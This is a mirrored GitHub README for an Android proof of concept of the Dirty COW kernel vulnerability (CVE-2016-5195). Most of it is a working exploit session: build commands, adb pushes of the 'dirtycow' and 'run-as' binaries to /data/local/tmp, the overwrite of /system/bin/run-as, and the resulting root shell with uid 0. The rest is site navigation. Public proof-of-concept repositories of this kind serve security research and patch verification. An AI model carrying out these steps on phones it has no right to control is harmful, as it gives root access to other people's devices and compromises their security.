GithubHelp home page GithubHelp logo

tempbottle / cve-2016-5195 Goto Github PK

View Code? Open in Web Editor NEW

This project forked from timwr/cve-2016-5195

0.0 2.0 0.0 45 KB

CVE-2016-5195 (dirtycow/dirtyc0w) proof of concept for Android

Makefile 12.14% C 84.43% Shell 3.44%

cve-2016-5195's Introduction

CVE-2016-5195

CVE-2016-5195 (dirty cow/dirtycow/dirtyc0w) proof of concept for Android

This repository demonstrates the vulnerability on vulnerable Android devices attached via ADB. It does not disable SELinux (see timwr#9) or install superuser on the device.


$ make root
ndk-build NDK_PROJECT_PATH=. APP_BUILD_SCRIPT=./Android.mk APP_PLATFORM=android-16
make[1]: Entering directory '/home/user/dev/git/exploits/CVE-2016-5195'
[arm64-v8a] Install        : dirtycow => libs/arm64-v8a/dirtycow
[arm64-v8a] Install        : run-as => libs/arm64-v8a/run-as
[x86_64] Install        : dirtycow => libs/x86_64/dirtycow
[x86_64] Install        : run-as => libs/x86_64/run-as
[mips64] Install        : dirtycow => libs/mips64/dirtycow
[mips64] Install        : run-as => libs/mips64/run-as
[armeabi-v7a] Install        : dirtycow => libs/armeabi-v7a/dirtycow
[armeabi-v7a] Install        : run-as => libs/armeabi-v7a/run-as
[armeabi] Install        : dirtycow => libs/armeabi/dirtycow
[armeabi] Install        : run-as => libs/armeabi/run-as
[x86] Install        : dirtycow => libs/x86/dirtycow
[x86] Install        : run-as => libs/x86/run-as
[mips] Install        : dirtycow => libs/mips/dirtycow
[mips] Install        : run-as => libs/mips/run-as
make[1]: Leaving directory '/home/user/dev/git/exploits/CVE-2016-5195'
adb push libs/armeabi-v7a/dirtycow /data/local/tmp/dcow
[100%] /data/local/tmp/dcow
adb push libs/armeabi-v7a/run-as /data/local/tmp/run-as
[100%] /data/local/tmp/run-as
adb shell '/data/local/tmp/dcow /data/local/tmp/run-as /system/bin/run-as'
dcow /data/local/tmp/run-as /system/bin/run-as
warning: new file size (5544) and destination file size (17944) differ

[*] size 5544
[*] mmap 0xb536b000
[*] currently 0xb536b000=464c457f
[*] madvise = 0xb536b000 5544
[*] madvise = 0 0
[*] /proc/self/mem 5544 1
[*] exploited 0xb536b000=464c457f
adb shell /system/bin/run-as
uid /system/bin/run-as 2000
uid 0
0 u:r:runas:s0
context 0 u:r:shell:s0
/system/bin/sh: can't find tty fd: No such device or address
/system/bin/sh: warning: won't have full job control
shamu:/ # id
uid=0(root) gid=0(root) groups=0(root),1004(input),1007(log),1011(adb),1015(sdcard_rw),1028(sdcard_r),3001(net_bt_admin),3002(net_bt),3003(inet),3006(net_bw_stats),3009(readproc) context=u:r:shell:s0
shamu:/ #

cve-2016-5195's People

Contributors

timwr avatar toxeus avatar anwarmohamed avatar manouchehri avatar

Watchers

tempbottle avatar avatar

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    ๐Ÿ–– Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. ๐Ÿ“Š๐Ÿ“ˆ๐ŸŽ‰

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google โค๏ธ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.